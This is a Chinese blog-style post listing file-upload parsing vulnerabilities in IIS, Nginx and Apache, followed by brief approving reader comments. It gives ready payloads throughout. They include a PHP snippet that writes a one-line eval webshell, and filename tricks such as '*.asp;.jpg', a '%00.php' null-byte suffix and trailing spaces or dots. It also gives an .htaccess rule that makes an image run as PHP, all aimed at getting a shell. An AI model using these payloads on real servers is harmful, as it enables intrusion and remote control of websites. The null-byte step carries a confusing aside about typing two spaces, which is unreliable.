一些Web服务器程序(IIS,Apache,Nginx.....)的解析漏洞归纳

admin

一、IIS 5.x/6.0解析漏洞
IIS解析漏洞1：

在网站下建立文件夹的名字为 *.asp、*.asa 的文件夹，其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。例如创建目录 test.asp，那么 /test.asp/test.jpg 将被当作 asp 文件来执行。有些后台能够自定义上传的路径，但可能对上传类型做了限制，利用这个漏洞可以上传图片拿shell。


IIS解析漏洞2：


网站上传图片的时候，将网页木马文件的名字改成“*.asp;.jpg”，也同样会被 IIS 当作 asp 文件来解析。



二、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞

在默认Fast-CGI开启状况下,黑客上传一个名字为test.jpg，内容为：<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>的文件，然后访问test.jpg/.php,在这个目录下就会生成一句话木马 shell.php。



三、Nginx <8.03 空字节代码执行漏洞




影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37



Nginx在图片中嵌入PHP代码然后通过访问



xxx.jpg%00.php

就是打两个空格



来执行其中的代码



四、Apache解析漏洞



Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.



比如 test.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把test.php.owf.rar解析成php.



如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个wooyun.php.rara.jpg.png…（把你知道的常见后缀都写上…）去测试是否是合法后缀



五、其他



在windows环境下，xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的，若这样命名，windows会默认除去空格或点,黑客可以通过抓包，在文件名后加一个空格或者点绕过黑名单.若上传成功，空格和点都会被windows自动消除,这样也可以getshell。



如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入:



<FilesMatch "test.jpg"> SetHandler application/x-httpd-php </FilesMatch>



然后再上传shell.jpg的木马, 这样shell.jpg就可解析为php文件

路过，支持一下啦

学习了，不错，讲的太有道理了

果然是好东西啊